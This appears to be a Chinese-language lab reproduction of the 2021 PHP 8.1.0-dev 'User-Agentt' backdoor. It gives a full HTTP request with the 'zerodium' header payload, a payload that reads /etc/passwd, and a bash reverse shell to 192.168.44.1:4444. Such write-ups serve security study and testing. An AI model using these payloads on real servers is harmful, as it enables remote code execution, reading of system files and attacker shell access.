PHP 8.1.0-dev User-Agentt 后门

PHP 8.1.0-dev User-Agentt 后门

PHP 8.1.0-dev 版本于 2021 年 3 月 28 日被植入后门,但后门很快被发现并移除。当服务器上存在此后门时,攻击者可以通过发送User-Agentt标头来执行任意代码。

参考:

漏洞复现

环境启动后,服务运行于http://192.168.44.132:8080

发送以下请求以执行代码var_dump(233*233);

1
2
3
4
5
6
7
8
GET / HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
User-Agentt: zerodiumvar_dump(233*233);
Connection: close

image-20211116172033506

将字段后面poc修改为zerodiumsystem("cat /etc/passwd");读取文件

image-20211116172113356

修改payload执行反弹shell,并设置监听,将poc修改为以下反弹shell的poc

1
zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/192.168.44.1/4444 0>&1'");

image-20211116172400753

0%